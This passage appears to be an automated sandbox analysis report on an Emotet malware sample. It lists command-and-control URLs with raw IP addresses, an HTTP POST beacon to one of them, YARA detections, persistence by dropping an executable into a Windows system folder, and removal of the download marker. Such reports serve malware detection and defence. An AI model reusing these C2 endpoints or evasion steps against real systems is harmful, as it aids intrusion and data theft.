"XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
                    Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
                    Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmpString found in binary or memory: is absolutely free to play, you have the ability to unlock optional bonuses via in-app purchases from within the game. You may disable in-app purchases in your device settings.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"Legac
                    Source: unknownHTTP traffic detected: POST /DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/ HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------80lhrKDVYliktvcpjgmL9User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 142.44.137.67:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmpString found in binary or memory: http://142.44.137.67:443/DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmpString found in binary or memory: http://142.44.137.67:443/DLgjaT02V4ZRh7a7A/wt8CBtC1NZfAQWkn/T
                    Source: dot3hc.exe, 00000003.00000002.617493690.00000000029F9000.00000004.00000001.sdmpString found in binary or memory: http://162.241.242.173:8080/nPONFQEvQO/m1R1pV6p0j201mdDM/V3kdX/
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmpString found in binary or memory: http://192.158.216.73/bw3A8vOSwPk/MUmkPxxvia/gp9rmo9BY/Aiyozum4do0I2sb158h/TZEWfRpLT/CpHNbkWtxKNiePn
                    Source: dot3hc.exe, 00000003.00000002.617493690.00000000029F9000.00000004.00000001.sdmpString found in binary or memory: http://78.24.219.147:8080/2VdcJgn3KtqNnFx/FoHxTH03XYaP/
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmpString found in binary or memory: http://78.24.219.147:8080/2VdcJgn3KtqNnFx/FoHxTH03XYaP/t
                    Source: dot3hc.exe, 00000003.00000002.617441030.00000000029E2000.00000004.00000001.sdmpString found in binary or memory: http://85.152.162.105/jIpQt16P2GWjQ5/wnzZKJ/DKZyC/
                    Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: svchost.exe, 0000000C.00000002.471659904.0000017DE7D75000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRoo
                    Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: svchost.exe, 00000012.00000002.617508051.0000017D2F811000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                    Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: svchost.exe, 0000000C.00000003.470057078.0000017DE7452000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: svchost.exe, 00000012.00000002.617508051.0000017D2F811000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                    Source: svchost.exe, 00000012.00000002.617508051.0000017D2F811000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                    Source: svchost.exe, 00000012.00000002.616906100.0000017D2F6D0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                    Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                    Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                    Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
                    Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
                    Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
                    Source: svchost.exe, 0000000C.00000003.449149844.0000017DE7DA0000.00000004.00000001.sdmpString found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
                    Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
                    Source: svchost.exe, 0000000C.00000003.457543774.0000017DE7DAB000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
                    Source: svchost.exe, 0000000C.00000003.450618925.0000017DE7D9E000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0040A094 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_0040A094
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0040A094 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,3_2_0040A094

                    E-Banking Fraud:

                    barindex
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 1.2.NWMEaRqF7s.exe.5a052e.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.NWMEaRqF7s.exe.5a23ae.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.NWMEaRqF7s.exe.5a23ae.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.dot3hc.exe.22d052e.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.dot3hc.exe.22d052e.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.dot3hc.exe.22d23ae.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.dot3hc.exe.22d23ae.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.NWMEaRqF7s.exe.5a052e.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000001.00000002.347473341.0000000002244000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.347079722.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.615027778.00000000022D0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.615086404.00000000022E4000.00000004.00000001.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeFile created: C:\Windows\SysWOW64\sqlcecompact40\Jump to behavior
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeFile deleted: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe:Zone.IdentifierJump to behavior
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0042F0781_2_0042F078
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_004202681_2_00420268
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0042339B1_2_0042339B
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0042C5501_2_0042C550
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0042E5F41_2_0042E5F4
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_004286401_2_00428640
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0042063C1_2_0042063C
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0042F73C1_2_0042F73C
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0041E7801_2_0041E780
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0043084D1_2_0043084D
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0040B8F61_2_0040B8F6
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_00420A481_2_00420A48
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0042EB361_2_0042EB36
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_00427C191_2_00427C19
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0041FD951_2_0041FD95
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_00420E681_2_00420E68
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_02252AEA1_2_02252AEA
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_02252C801_2_02252C80
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0042F0783_2_0042F078
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_004202683_2_00420268
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0042339B3_2_0042339B
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0042C5503_2_0042C550
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0042E5F43_2_0042E5F4
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_004286403_2_00428640
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0042063C3_2_0042063C
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0042F73C3_2_0042F73C
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0041E7803_2_0041E780
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0043084D3_2_0043084D
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0040B8F63_2_0040B8F6
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_00420A483_2_00420A48
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0042EB363_2_0042EB36
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_00427C193_2_00427C19
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0041FD953_2_0041FD95
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_00420E683_2_00420E68
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_02302AEA3_2_02302AEA
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_02302C803_2_02302C80
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_022D42983_2_022D4298
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_022D442E3_2_022D442E
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: String function: 004036EF appears 33 times
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: String function: 0041F71D appears 39 times
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: String function: 0041F6EA appears 140 times
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: String function: 00421418 appears 52 times
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: String function: 004036EF appears 33 times
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: String function: 0041F71D appears 39 times
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: String function: 0041F6EA appears 140 times
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: String function: 00421418 appears 52 times
                    Source: NWMEaRqF7s.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: NWMEaRqF7s.exe, 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamecmdcmxcfg.exe. vs NWMEaRqF7s.exe
                    Source: NWMEaRqF7s.exe, 00000001.00000002.348521498.0000000002E30000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs NWMEaRqF7s.exe
                    Source: NWMEaRqF7s.exe, 00000001.00000002.348726962.0000000002F20000.00000002.00000001.sdmpBinary or memory string: originalfilename vs NWMEaRqF7s.exe
                    Source: NWMEaRqF7s.exe, 00000001.00000002.348726962.0000000002F20000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs NWMEaRqF7s.exe
                    Source: NWMEaRqF7s.exeBinary or memory string: OriginalFilenamecmdcmxcfg.exe. vs NWMEaRqF7s.exe
                    Source: NWMEaRqF7s.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                    Source: classification engineClassification label: mal88.troj.evad.winEXE@8/4@0/88
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_02303686 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,3_2_02303686
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0040638F __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3_catch,FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,1_2_0040638F
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                    Source: NWMEaRqF7s.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: NWMEaRqF7s.exeVirustotal: Detection: 84%
                    Source: NWMEaRqF7s.exeMetadefender: Detection: 68%
                    Source: NWMEaRqF7s.exeReversingLabs: Detection: 92%
                    Source: unknownProcess created: C:\Users\user\Desktop\NWMEaRqF7s.exe 'C:\Users\user\Desktop\NWMEaRqF7s.exe'
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeProcess created: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeProcess created: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeJump to behavior
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeWindow detected: Number of UI elements: 11
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_00401D20 LoadLibraryW,GetProcAddress,1_2_00401D20
                    Source: NWMEaRqF7s.exeStatic PE information: real checksum: 0x5d872 should be: 0x5cbf3
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0042145D push ecx; ret 1_2_00421470
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0041B69C push 59FFFE78h; ret 1_2_0041B6A5
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_0041F7C2 push ecx; ret 1_2_0041F7D5
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0042145D push ecx; ret 3_2_00421470
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0041B69C push 59FFFE78h; ret 3_2_0041B6A5
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_0041F7C2 push ecx; ret 3_2_0041F7D5
                    Source: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeCode function: 3_2_022D974C push edx; ret 3_2_022D9761

                    Persistence and Installation Behavior:

                    barindex
                    Drops executables to the windows directory (C:\Windows) and starts themShow sources
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeExecutable created and started: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeJump to behavior
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exePE file moved: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exeJump to behavior

                    Hooking and other Techniques for Hiding and Protection:

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeFile opened: C:\Windows\SysWOW64\sqlcecompact40\dot3hc.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_00402130 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,1_2_00402130
                    Source: C:\Users\user\Desktop\NWMEaRqF7s.exeCode function: 1_2_004078B8 IsIconic,GetWindowPlacement,GetWindowRect,1_2_004078